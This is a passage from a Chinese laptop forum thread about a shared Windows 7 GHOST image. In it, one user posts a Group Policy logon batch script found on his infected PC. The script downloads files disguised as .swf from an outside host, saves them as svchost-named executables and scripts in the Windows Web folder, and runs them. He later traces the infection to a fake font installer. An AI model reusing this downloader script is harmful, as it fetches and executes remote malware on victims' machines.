找回密码
 注册
快捷导航
楼主: lioulangzhb

【再放猛帖】X41T WIN7家庭高级版 GHOST

[复制链接] |自动提醒
阅读字号:

5万

回帖

350

积分

1360

资产值

至尊会员III Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2006-8-23
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)
 楼主| 发表于 2010-9-26 12:07:47| 字数 23| - 中国–江苏–苏州 电信 | 显示全部楼层

回复 #30 xinzhitp 的帖子

新建账户可能有问题的
系统字体不要全替换啊。。。
X41T>X61>X301>X41T>X41+X61T+X200+X301>X200下半身OC+T410S下半身+X301OC>X301OC
回复 支持 反对

使用道具 举报

359

回帖

0

积分

889

资产值

入门会员 Rank: 1

注册时间
2008-5-24
发表于 2010-9-26 12:31:35| 字数 11| - 中国–江苏 移动/数据上网公共出口 | 显示全部楼层
haodongxi  感谢
回复 支持 反对

使用道具 举报

683

回帖

8

积分

3834

资产值

黄金会员 Rank: 3Rank: 3Rank: 3

注册时间
2010-8-16
发表于 2010-9-26 12:46:23| 字数 20| - 中国–湖南–衡阳 联通 | 显示全部楼层
在公司下载了,回去试下。
X41可以用不?
回复 支持 反对

使用道具 举报

90

回帖

0

积分

239

资产值

入门会员 Rank: 1

注册时间
2010-3-28
发表于 2010-9-26 12:50:02| 字数 29| - 中国–广西–防城港 电信 | 显示全部楼层

回复 #31 lioulangzhb 的帖子

这些坏东西是在Web目录下发现的。可能IE浏览器弄下来的?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

x
回复 支持 反对

使用道具 举报

5万

回帖

350

积分

1360

资产值

至尊会员III Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2006-8-23
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)
 楼主| 发表于 2010-9-26 13:04:39| 字数 16| - 中国–江苏–苏州 电信 | 显示全部楼层

回复 #33 yangbo840201 的帖子

应该可以 但手写什么的用不上了呵呵
X41T>X61>X301>X41T>X41+X61T+X200+X301>X200下半身OC+T410S下半身+X301OC>X301OC
回复 支持 反对

使用道具 举报

5万

回帖

350

积分

1360

资产值

至尊会员III Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2006-8-23
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)
 楼主| 发表于 2010-9-26 13:08:02| 字数 16| - 中国–江苏–苏州 电信 | 显示全部楼层

回复 #34 xinzhitp 的帖子

不清楚这个
你看看BAT是什么内容
X41T>X61>X301>X41T>X41+X61T+X200+X301>X200下半身OC+T410S下半身+X301OC>X301OC
回复 支持 反对

使用道具 举报

5万

回帖

350

积分

1360

资产值

至尊会员III Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2006-8-23
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)
 楼主| 发表于 2010-9-26 13:19:17| 字数 13| - 中国–江苏–苏州 电信 | 显示全部楼层
我刚看了镜像文件 没这个文件
X41T>X61>X301>X41T>X41+X61T+X200+X301>X200下半身OC+T410S下半身+X301OC>X301OC
回复 支持 反对

使用道具 举报

90

回帖

0

积分

239

资产值

入门会员 Rank: 1

注册时间
2010-3-28
发表于 2010-9-26 13:42:34| 字数 44| - 中国–广西–防城港 电信 | 显示全部楼层

回复 #37 lioulangzhb 的帖子

我初步肯定你的ghost有毒,稍候我上证据。我建议所有人停止下载,下载好的也先不要安装。
回复 支持 反对

使用道具 举报

90

回帖

0

积分

239

资产值

入门会员 Rank: 1

注册时间
2010-3-28
发表于 2010-9-26 13:51:40| 字数 2,679| - 中国–广西–防城港 电信 | 显示全部楼层
肯定有内容,而且是很危险的东西。但我还不太肯定。

我现在机器是肯定有问题的了,现在系统通过组策略设定了启动项,其中启动项内容就是检测联网后,把一些坏东西下载到Web目录下。

我看你的gho,组策略目录下没用user这个文件夹,也就可能也是后来生成的。没用user目录,但有全局的登录脚本,脚本也有引用其他东西,而且那些东西是一次性的,很可能已经毁尸灭迹了。

@echo off
echo date %date% >>%Windir%\today.cmd
timeout /t 7 /nobreak
net stop sppsvc /y>nul
call %Windir%\Indate.cmd
timeout /t 1 /nobreak
cscript //Nologo %Windir%\System32\slmgr.vbs -xpr>nul
call %Windir%\today.cmd
timeout /t 2 /nobreak
echo y | del %Windir%\today.cmd
exit


------------------登录后启动的脚本sys.bat-------------------------------
@Echo Off
Del /f /s /q /a %SystemRoot%\Web\svchst.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.vbs
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.vbs
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.exe
:Next
ping www.google.com &&Goto ok   
Goto End
k
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://liangci.gh60.com/images/u ... /20100000201001.swf %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://liangci.gh60.com/images/u ... /20100000201002.swf %SystemRoot%\Web\svchst.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://liangci.gh60.com/images/u ... /20100000201003.swf %SystemRoot%\Web\svchst.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://liangci.gh60.com/images/u ... /20100000201004.swf %SystemRoot%\Web\svchost.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://liangci.gh60.com/images/u ... /20100000201005.swf %SystemRoot%\Web\svchost.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://liangci.gh60.com/images/u ... /20100000201006.swf %SystemRoot%\Web\svchost.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://liangci.gh60.com/images/u ... /20100000201007.swf %SystemRoot%\Web\svchost1.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://liangci.gh60.com/images/u ... /20100000201008.swf %SystemRoot%\Web\svchost1.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchost.vbs

Exit
:End
ping www.google.com &&Goto ok
Goto End
回复 支持 反对

使用道具 举报

90

回帖

0

积分

239

资产值

入门会员 Rank: 1

注册时间
2010-3-28
发表于 2010-9-26 14:16:39| 字数 262| - 中国–广西–防城港 电信 | 显示全部楼层
抱歉!楼主。

我根据组策略里面的启动文件创建时间查看系统日志,在今天10点钟左右,我下载了个字体安装版,大概就是微软雅黑VistaFont这个exe文件,我直接运行了,但在Windows7下面有提示兼容问题没用成功运行,后来系统建议使用了兼容模式,这些都在系统日志里面有记录。

日志里面还记录有组策略的更改,其中就是加入了开机登录自动下载病毒的文件,于是噩梦开始了。我的备份文件.gho全都消失了,目前还不清楚其他损失。

字体问题啊,真是害死人。数据恢复软件一点用都没用,可能是病毒作了覆盖吸入,完全销毁文件了!

该死的人,快死吧。
回复 支持 反对

使用道具 举报

90

回帖

0

积分

239

资产值

入门会员 Rank: 1

注册时间
2010-3-28
发表于 2010-9-26 15:53:38| 字数 39| - 中国–广西–防城港 电信 | 显示全部楼层
Windows7中毒记
http://999.appspot.com/t/158
回复 支持 反对

使用道具 举报

5万

回帖

350

积分

1360

资产值

至尊会员III Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2006-8-23
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)
 楼主| 发表于 2010-9-26 18:25:24| 字数 20| - 中国–江苏–苏州 电信 | 显示全部楼层
替换字体要和宋体一起替换~这个我好像说了
X41T>X61>X301>X41T>X41+X61T+X200+X301>X200下半身OC+T410S下半身+X301OC>X301OC
回复 支持 反对

使用道具 举报

56

回帖

1

积分

69

资产值

初级会员 Rank: 1

注册时间
2010-5-30
发表于 2010-9-27 07:54:07| 字数 50| - 中国–天津–天津 联通 | 显示全部楼层
求楼主再放显卡驱动 你OFFICE里9月19日放的包包打不开
顺便再放个batterymon电源管理软件
回复 支持 反对

使用道具 举报

683

回帖

8

积分

3834

资产值

黄金会员 Rank: 3Rank: 3Rank: 3

注册时间
2010-8-16
发表于 2010-9-27 08:01:27| 字数 42| - 中国–湖南–衡阳 联通 | 显示全部楼层
严重关注41楼问题进展。
衡阳人民己经安装了,但是目前尚未发现异常,最新瑞星查杀无毒。
回复 支持 反对

使用道具 举报

683

回帖

8

积分

3834

资产值

黄金会员 Rank: 3Rank: 3Rank: 3

注册时间
2010-8-16
发表于 2010-9-27 13:12:52| 字数 15| - 中国–湖南–衡阳 联通 | 显示全部楼层
经检查,完全好用。收藏并送花。
T500:T9600,4G*2,Scandisk60G SSD+光驱位500G,1680*1050,蓝指摄无。
回复 支持 反对

使用道具 举报

20

回帖

0

积分

167

资产值

入门会员 Rank: 1

注册时间
2008-1-8
发表于 2010-9-27 18:18:26| 字数 26| - 中国–福建–厦门 电信 | 显示全部楼层
我已经装在 tf 卡上用了~  就是电源管理装上不能打开设置
回复 支持 反对

使用道具 举报

90

回帖

0

积分

239

资产值

入门会员 Rank: 1

注册时间
2010-3-28
发表于 2010-9-27 20:48:32| 字数 49| - 中国–广西–防城港–防城区 电信 | 显示全部楼层

回复 #44 yangbo840201 的帖子

请放心使用,是我折腾字体导致的问题,和楼主的镜像无关。

楼主的w2k3 ramos也很不错,速度很快~
回复 支持 反对

使用道具 举报

5万

回帖

350

积分

1360

资产值

至尊会员III Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2006-8-23
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)
 楼主| 发表于 2010-9-27 23:34:32| 字数 6| - 中国–江苏–苏州 电信 | 显示全部楼层

回复 #46 qbtsgz 的帖子

要装电池驱动
X41T>X61>X301>X41T>X41+X61T+X200+X301>X200下半身OC+T410S下半身+X301OC>X301OC
回复 支持 反对

使用道具 举报

5万

回帖

350

积分

1360

资产值

至尊会员III Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2006-8-23
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)
 楼主| 发表于 2010-9-27 23:45:58| 字数 43| - 中国–江苏–苏州 电信 | 显示全部楼层

回复 #43 anleeo 的帖子

http://www.ibmnb.com/thread-885595-1-4.html

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

x
X41T>X61>X301>X41T>X41+X61T+X200+X301>X200下半身OC+T410S下半身+X301OC>X301OC
回复 支持 反对

使用道具 举报

20

回帖

0

积分

167

资产值

入门会员 Rank: 1

注册时间
2008-1-8
发表于 2010-9-27 23:47:38| 字数 132| - 中国–福建–厦门 电信 | 显示全部楼层

回复 #48 lioulangzhb 的帖子

能 给个地址么~ 我系统装在手机内存卡上的~ 要装个东西 慢的要死~ 开了系统写保护后系统运行速度还行,就是装不了软件了~   

还有~ 电脑里没装硬盘 启动自检的时候要等几十秒钟大概是在找硬盘吧才能启动, 用U盘ramos 也是一样 有没什么办法在BIOS里面设置一下 跳过检测缩短启动时间?
回复 支持 反对

使用道具 举报

5万

回帖

350

积分

1360

资产值

至尊会员III Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2006-8-23
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)
 楼主| 发表于 2010-9-27 23:57:15| 字数 29| - 中国–江苏–苏州 电信 | 显示全部楼层
1。搜索  联想   进去  找~~ 真的不建议装这个
2. 3.06BIOS
X41T>X61>X301>X41T>X41+X61T+X200+X301>X200下半身OC+T410S下半身+X301OC>X301OC
回复 支持 反对

使用道具 举报

20

回帖

0

积分

167

资产值

入门会员 Rank: 1

注册时间
2008-1-8
发表于 2010-9-28 00:02:34| 字数 67| - 中国–福建–厦门–思明区 电信 | 显示全部楼层

回复 #51 lioulangzhb 的帖子

就是用的 3.06 BIOS    启动的时候什么提示都没有 就是出现IBM logo  的时候 要等几十秒才能引导  装上硬盘不从硬盘启动也不要那么久的时间~
回复 支持 反对

使用道具 举报

5万

回帖

350

积分

1360

资产值

至尊会员III Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2006-8-23
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)
 楼主| 发表于 2010-9-28 00:10:30| 字数 7| - 中国–江苏–苏州 电信 | 显示全部楼层
那好像没办法了
X41T>X61>X301>X41T>X41+X61T+X200+X301>X200下半身OC+T410S下半身+X301OC>X301OC
回复 支持 反对

使用道具 举报

374

回帖

0

积分

238

资产值

入门会员 Rank: 1

注册时间
2003-10-9
铜牌荣誉勋章(注册8年以上会员)
发表于 2010-9-28 22:10:26| 字数 27| - 中国–浙江–杭州 电信 | 显示全部楼层
感谢lz,先顶后下。
一直想找个家庭瘦身版的给41用;)
回复 支持 反对

使用道具 举报

16

回帖

0

积分

365

资产值

入门会员 Rank: 1

注册时间
2008-12-19
发表于 2010-9-28 22:48:42| 字数 11| - 中国–安徽–六安 电信 | 显示全部楼层
搞下来试下!好用再谢!
回复 支持 反对

使用道具 举报

698

回帖

0

积分

769

资产值

入门会员 Rank: 1

注册时间
2008-10-23
发表于 2010-9-29 04:33:45| 字数 7| - 德国 | 显示全部楼层
顶liou兄!
X41T 1.6G, 二手
X300二手,亚洲象=没道德的混蛋,拆了wusb,wwan,静电保护膜都拆!
回复 支持 反对

使用道具 举报

9713

回帖

116

积分

3万

资产值

至尊会员I Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2003-4-6
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)月全勤勋章
发表于 2010-9-29 08:09:34| 字数 6| - 中国–江苏–常州 电信 | 显示全部楼层
没看见地址么
...
回复 支持 反对

使用道具 举报

56

回帖

1

积分

69

资产值

初级会员 Rank: 1

注册时间
2010-5-30
发表于 2010-9-29 08:14:10| 字数 4| - 中国–天津–天津 联通 | 显示全部楼层
感谢楼主
回复 支持 反对

使用道具 举报

5万

回帖

350

积分

1360

资产值

至尊会员III Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2006-8-23
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)
 楼主| 发表于 2010-9-29 08:17:38| 字数 5| - 中国–江苏–苏州 电信 | 显示全部楼层

回复 #57 s20 的帖子

第一行就是
X41T>X61>X301>X41T>X41+X61T+X200+X301>X200下半身OC+T410S下半身+X301OC>X301OC
回复 支持 反对

使用道具 举报

9713

回帖

116

积分

3万

资产值

至尊会员I Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2003-4-6
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)月全勤勋章
发表于 2010-9-29 11:39:30| 字数 10| - 中国–江苏–常州 电信 | 显示全部楼层
不好意思 只顾往下看了
...
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

Powered by Discuz! X3.5 © 2001-2023 Comsenz Inc

GMT+8, 2024-11-28 14:28 , Processed in 0.226374 second(s), 62 queries , Gzip On, OPcache On.

手机版|小黑屋|安卓客户端|iOS客户端|Archiver|备用网址1|备用网址2|联系我们|专门网

返回顶部